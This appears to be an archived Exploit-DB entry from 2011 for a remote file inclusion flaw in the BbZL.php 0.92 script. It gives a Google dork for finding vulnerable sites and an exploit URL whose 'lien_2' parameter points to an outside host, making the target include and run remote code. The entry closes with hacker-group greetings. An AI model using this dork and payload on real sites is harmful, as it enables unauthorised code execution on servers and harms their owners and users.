BbZL.php - Remote File Inclusion

EDB-ID:

17495

CVE:

N/A


Author:

Number 7

Type:

webapps


Platform:

PHP

Date:

2011-07-06


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

 _________________________________________________________________________________________
|                           _              _                                              |
| ||\\      || ||       || | \\          // |  ____      ________           __________    |
| || \\     || ||       || | |\\        //| | |     \   |  ______|         |_______/ /    |
| ||  \\    || ||       || | | \\      // | | |  _   \  | |                       / /     |
| ||   \\   || ||       || | |  \\    //  | | | |_)  |  | |______    /\`'__\     / /      |
| ||    \\  || ||       || | |   \\  //   | | |  _  <   |  ______|   \ \ \/     / /       |
| ||     \\ || ||_______|| | |    \\//    | | | |_)  |  | |______     \ \_\    / /        |
| ||      \\|| |_________| |_|     \/     |_| |_____/   |________|     \/_/   /_/         |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [BbZL.PhP File Inclusion Exploit]
# Google Dork: [intitle:"BbZL.PhP 0.92 CSS²"]
# Date: [06/07/2011]
# Author: [Number 7]
# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]
# Version: [0.92 CSS²]
# Tested on: [linux/Windows NT]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreetZ:S-man // Wx // Alen // M@TaDoR // LastBreath1 // all Tunisian Hackers